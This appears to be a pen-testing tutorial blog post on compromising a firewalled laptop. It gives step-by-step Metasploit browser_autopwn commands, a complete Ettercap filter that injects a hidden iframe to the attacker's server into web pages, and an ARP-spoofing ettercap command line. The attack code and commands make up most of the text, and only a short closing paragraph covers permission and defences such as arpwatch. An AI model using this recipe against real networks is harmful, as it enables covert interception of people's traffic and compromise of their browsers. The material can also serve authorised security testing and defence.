Here is the scenario – you are working on a pen test, and the assigned “flag” is gaining access to a laptop from someone on the organization’s security team. You get access to the internal network through some silly file inclusion or SQL injection vulnerability. You find your target box….but alas, it has has a firewall in place. Not a single port is open. Do you hang your head in shame? No. There are still plenty options. This quick tutorial will look at how to use Ettercap to get someone to open up a server running Metasploit’s browser_autopwn (without even knowing it).

We know that the target is a laptop, so we can assume that it will likely be used to browse the web. One common attack vector I have seen proposed is to spoof the DNS requests, and redirect the users to a malicious web page. There are a few problems with this method. The laptop laptop likely has a DNS cache of common sites. Even if we can get DNS redirection to work, it will be obvious to the user that something is not quite right when Google comes up as a blank page a starts trying to install scripts.

One of the very useful features of Ettercap is its filtering feature. What if we could generate a filter that would insert a hidden <iframe> every time the victim requested something with a <body> tag. Good news – we can.

Before we get ahead of ourselves, we first need to create something to put in this iframe.

As a root user:

msfconsole (start up metasploit)

msf> use auxiliary/server/browser_autopwn (select browser_autopwn)

msf>set LHOST [your ip here] (make sure the payloads know where to connect back)

msf>set SRVPORT 80 (Set the server to listen on port 80)

msf>set URIPATH / (Set the malicious page to the webroot)

msf>run

Now we have Metasploit’s browser_autopwn running. As soon as anyone connects to http://[attacker ip], Metasploit will attempt to exploit the users browser. Very cool indeed (at least for the attacker).

Next, we have to make the users open up our malicious page. This is where Ettercap comes in.

First, enable IP forwarding.

echo 1 > /proc/sys/net/ipv4/ip_forward

Now we need to create our Ettercap filter. The following script should hopefully be commented enough to make sense.

For more information about Ettercap filters take a look at:

man etterfilter

and

cat /usr/share/ettercap/etter.filter.examples

[START SCRIPT]

#------------------------Filter Example By Kno----------------------------

#|  Replace attacker ip (192.168.56.101) with correct address (4 times)  |

#-------------------------------------------------------------------------

#--Make sure we are working with Plain Text--

#If traffic is TCP, is not to our attacking server, and is on ports 80 or 8080 (HTTP)....

if (ip.proto == TCP && ip.dst != '192.168.56.101' && tcp.dst == 80 || tcp.dst == 8080) {

 #...and if it contains an Accept-Encoding header...

 if (search(DATA.data, "Accept-Encoding")) {

 #...remove any Encoding (make sure we are using plain text)

 replace("Accept-Encoding", "Accept-Nothing!");

 }

}

#--Inject Iframe--

if (ip.proto == TCP && ip.dst != '192.168.56.101' && tcp.src == 80 || tcp.src == 8080) {

 if (search(DATA.data, "<body>")){

 #Replace it with the body tag and an iframe to our attacking webpage

 replace("<body>","<body><iframe src='http://192.168.56.101' width=0 height=0 />");

 msg("iframe injected after <body>\n");

 }

 if (search(DATA.data, "<BODY>")){

 replace("<BODY>","<BODY><IFRAME SRC='http://192.168.56.101' width=0 height=0 />");

 msg("iframe injected after <BODY>\n");

 }

}

[END SCRIPT]

It is worth noting, that the replace “function” will not change the size of the DATA.data buffer. This means that if the text that you are replacing is shorter than what you are replacing it with, some things will be cut off at the end of the buffer. In our filter example, a bit of information is going to get cut off from the end of the page because of the extra <iframe…> that is being added. Usually this is means part of the page footer and the </body></html> will be lost. Hopefully it won’t make too much of a difference. In my testing, the filter only had problems with really short web pages.

Let’s compile our filter

etterfilter iframe.filter -o iframe.ef

Let’s start up Ettercap:

ettercap -T -i eth0 -q -F iframe.ef -M ARP /192.168.56.102/ //

-T is for text mode

-i eth0 specifies our interface

-q makes Ettercap run in quite mode (not as much output to the screen)

-F iframe.ef selects our Ettercap filter we created and compiled earlier

-M ARP specifies the method we are going to use (in this case ARP spoofing)

Ettercap accepts targets by the following convention:

MAC ADDRESS(es)/IP ADDRESS(es)/PORT(s)

so /192.168.56.102/ // means that our first target is anything with an IP of 192.168.56.102 and our second target is anything and everything. We are basically telling 192.168.56.102 that the attacker PC is the router, and we are telling everyone else that the attacker PC is the victim’s laptop.  This means that all the traffic to and from the victim’s laptop will have to go through us. (If this doesn’t make any sense or if you are not familiar with ARP poising, you should Google it.)

If all is working properly, when our victim browses the web, any page they go to will contain an IFRAME with our malicious browser_autopwn page. If their browser is vulnerable, or they run the extra “plug-ins” needed – Game over. You win.

Please don’t use this information for any malicious purposes. My hope is that this post will make the reader aware of a security risk (and possibly help the reader use it for a pen test or lab experimentation- only after receiving appropriate permission, of course).  Good security practices, such as keeping current with updates, verifying plug-ins before running them, and implementing IDS measures (such as arpwatch) could help prevent an attack like this.

Thanks to t3h3v1lh4x0r for noting an improperly quoted replace() function.  It is now fixed.